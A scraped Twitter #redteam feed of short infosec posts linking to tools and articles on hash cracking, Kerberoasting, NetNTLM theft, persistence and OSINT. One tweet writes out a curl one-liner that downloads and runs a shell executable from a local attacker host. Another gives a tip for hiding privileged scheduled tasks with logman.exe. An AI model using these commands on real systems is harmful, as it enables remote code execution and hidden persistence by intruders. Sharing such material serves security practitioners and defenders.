-
A tool for automating cracking methodologies through Hashcat from
@TrustedSec#infosec#pentest#redteam https://github.com/trustedsec/hate_crack … -
Stay on top of current TTPs and how to reduce risk at your enterprise! https://www.hackerpom.com/feed LeHACK 2020 Call For Papers https://packetstormsecurity.com/files/156175/LeHACK-2020-Call-For-Papers.html …
#redteam#security -
So Madre is retired, a Vet and has cancer, Right? And a Land Line. Oh the Scams just line up at the fucking door. Mistake... calling mom's house and giving me a telephone number. I'm a Telco Engineer shitheads. Just Went
#RedTeam Bored anyway.Prikaži ovu nit -
I know, analogies are not perfect. I'm ready to get roasted, but this is an approach to explain the differences between Vul. Assessment,
#Pentest and#RedTeam. pic.twitter.com/xrqAgaJl9w
-
Places of Interest in Stealing NetNTLM Hashes
#infosec#pentest#redteam https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ … -
Be careful what you copy: Invisibly inserting usernames into text with Zero-Width Characters
#infosec#pentest#redteam https://medium.com/@umpox/be-careful-what-you-copy-invisibly-inserting-usernames-into-text-with-zero-width-characters-18b4e6f17b66 … -
This came in today! So since I’m stuck in the house it’s good timing.
#infosec#RedTeam pic.twitter.com/z1dg3Qxkvr
-
better informed is better prepared. — army ranger training manual.
#RedTeam#meditationpic.twitter.com/C2IFPp6MW6
-
A View of Persistence - great post by
@_RastaMouse#infosec#pentest#redteam https://rastamouse.me/2018/03/a-view-of-persistence/ … -
SNMP Config File Injection to Shell
#infosec#pentest#redteam https://digi.ninja/blog/snmp_to_shell.php … -
EXTRACTING SERVICE ACCOUNT PASSWORDS WITH KERBEROASTING
#infosec#pentest#redteam https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ … -
I have a few books to give away. If you are new to the infosec community, find me at
#shmoocon , I'll give you a copy.#redteam pic.twitter.com/ZJXVZpBtd1
-
#Curl.exe is the new#rundll32.exe -#LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 … https://youtu.be/f2xpCl2Y7t8#blueteam#redteam#dfir#ThreatHunting -
Windows passwords decryption from dump files
#infosec#pentest#redteam https://github.com/AlessandroZ/LaZagneForensic …pic.twitter.com/50cBDaEUNA -
#OSINT : Built With:https://builtwith.com Google Dorks:https://www.exploit-db.com/google-hacking-database/ … Metagoofil:https://code.google.com/archive/p/metagoofil … Censys:https://censys.io/ URLScan:https://urlscan.io/ DNSStuff:https://www.dnsstuff.com/tools Netcraft:https://searchdns.netcraft.com#bugbountytips#redteam#BugBounty -
#redteam tip: use logman.exe with -b, -rf, -s, and -rc to create highly-privileged local, and remote scheduled tasks. They are deeply hidden in the Task Scheduler GUI, especially as the actions are masked under "Custom Handler". And no one looks for attackers in Perfmon/DCS. -
.
@SpecterOps recently decommissioned their Adversary Tactics:#PowerShell course, and rather than let it collect dust, they offered it up to the community for free in the spirit of their commitment to transparency. https://github.com/specterops/at-ps …#ThankYou#DFIR#BlueTeam#RedTeam -
#OSINT: theHarvester:https://github.com/laramies/theHarvester … Recon-ng:https://bitbucket.org/LaNMaSteR53/recon-ng … FOCA:https://github.com/ElevenPaths/FOCA … Discover:https://github.com/leebaird/discover … Spiderfoot:http://www.spiderfoot.net/ Sn1per:https://github.com/1N3/Sn1per SimplyEmail:https://github.com/SimplySecurity/SimplyEmail …#bugbountytips#redteam#BugBounty
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.